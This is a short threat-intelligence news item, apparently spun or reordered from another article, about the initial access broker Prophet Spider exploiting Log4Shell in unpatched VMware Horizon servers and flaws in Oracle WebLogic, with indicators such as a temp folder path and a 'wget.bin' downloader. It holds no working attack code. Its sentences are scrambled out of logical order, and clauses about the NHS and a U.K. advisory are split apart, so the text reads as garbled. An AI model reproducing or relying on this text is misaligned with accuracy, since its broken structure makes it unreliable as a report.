Prophet Spider is known to be active since at least May 2017. Like with many other initial access brokers, the footholds are sold to the highest bidder on underground forums located in the dark web, who then exploit the access for ransomware deployment. Prophet Spider primarily gains access to victims by compromising vulnerable web servers, and uses a variety of low-prevalence tools to achieve operational objectives, when the group was spotted actively exploiting flaws in Oracle WebLogic servers to gain initial access to target environments. The observed instances of exploitation mirroring tactics, techniques, and procedures (TTPs) previously attributed to the Prophet Spider eCrime cartel, including the use of "C:\Windows\Temp\7fde\" folder path to store malicious files and "wget.bin" executable to fetch additional binaries as well as overlaps in infrastructure used by the group. Since public disclosure of the flaw last month, threat actors have been quick to operationalize this new attack vector for a variety of intrusion campaigns to gain full control of affected servers. Log4Shell is a moniker used to refer to an exploit affecting the popular Apache Log4j library that results in remote code execution by logging a specially crafted string. National Health Service (NHS) that sounded the alarm on active exploitation of the vulnerabilities in VMware Horizon servers to drop malicious web shells and establish persistence on affected networks for follow-on attacks. The payloads observed include cryptocurrency miners, Cobalt Strike Beacons, and web shells, corroborating a previous advisory from the U.K. The cybercrime actor has been opportunistically weaponizing the shortcoming to download a second-stage payload onto the victimized systems. An initial access broker group tracked as Prophet Spider has been linked to a set of malicious activities that exploits the Log4Shell vulnerability in unpatched VMware Horizon Servers.
0 kommentar(er)
